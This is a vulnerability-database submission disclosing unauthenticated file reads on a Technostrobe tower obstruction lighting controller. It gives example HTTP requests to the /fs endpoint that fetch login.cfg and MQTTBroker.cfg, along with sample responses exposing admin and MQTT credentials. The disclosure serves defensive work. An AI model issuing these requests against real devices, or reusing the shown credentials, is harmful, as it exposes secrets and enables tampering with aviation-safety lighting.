Submeter #783324: Technostrobe HI-LED-WR120-G2 Obstruction Lighting Controller 5.5.0.1R6.03.30 Information Disclosureinformação

Título	Technostrobe HI-LED-WR120-G2 Obstruction Lighting Controller 5.5.0.1R6.03.30 Information Disclosure
Descrição	Sensitive files are accessible without authentication via direct HTTP requests. Example Request: GET /config/system.cfg HTTP/1.1 Host: <target> Example Response: username=admin password=admin123 Bug 2.0.1 — Credential File Exposed (/login.cfg) The Request GET http://technostrobe.shiky.demo:58746/fs?file=%2Flogin.cfg URL-decoded: GET /fs?file=/login.cfg ┌─────────────┐ ┌──────────────────┐ │ │ GET /fs?file=/ │ │ │ Attacker │ login.cfg ──────────▶│ /fs endpoint │ │ (no creds) │ │ (no auth check) │ │ │◀──── file contents ───│ │ └─────────────┘ └──────────────────┘ What the Response Looks Like The login.cfg file contains user accounts and their passwords. The passwords are stored in Base64 encoding. # login.cfg — served freely to anyone who asks userId=0001 password=MDAwMTAxNGE0NQ== ← base64 role=admin Bug 2.1.1 — MQTT Broker Configuration Exposed The Request GET http://technostrobe.shiky.demo:58746/fs?file=%2Fconfig%2FMQTTBroker.cfg URL-decoded: GET /fs?file=/config/MQTTBroker.cfg What Is MQTT? ┌─────────────────────────────────────────────────────────────────┐ │ MQTT IN TOWER LIGHTING │ │ │ │ Tower Light ──[MQTT publish]──▶ Broker ──[subscribe]──▶ NOC │ │ │ │ Topics might include: │ │ • tower/lights/status (light on/off/fault) │ │ • tower/psu/voltage (power supply health) │ │ • tower/alarms/active (fault alerts) │ │ • tower/control/command (⚠️ incoming commands) │ └─────────────────────────────────────────────────────────────────┘ What the Config File Contains # /config/MQTTBroker.cfg — served freely to anyone who asks [broker] host = mqtt.operations.example.com port = 1883 clientId = technostrobe-07223277T4O5BH [auth] username = tower_device_01 password = Twr0$ec2018! [topics] publish = tower/hiled/status subscribe= tower/hiled/control Root Cause: The web server exposes internal files without enforcing authentication or access restrictions. Impact: Disclosure of credentials Exposure of configuration data Enables further attacks such as authentication bypass
Fonte	⚠️ https://github.com/shiky8/my--cve-vulnerability-research/blob/main/my_VulnDB_cves/CVE-TECHNOSTROBE-03-InfoDisclosure.md
Utilizador	shiky8 (UID 96565)
Submissão	20/03/2026 01h19 (há 22 dias)
Moderação	04/04/2026 16h41 (16 days later)
Estado	Aceite
Entrada VulDB	355341 [Technostrobe HI-LED-WR120-G2 5.5.0.1R6.03.30 Configuration Data /fs Ficheiro Divulgação de Informação]
Pontos	20

◂ Voltar Visão Geral Próximo ▸

Do you want to use VulDB in your project?

Use the official API to access entries easily!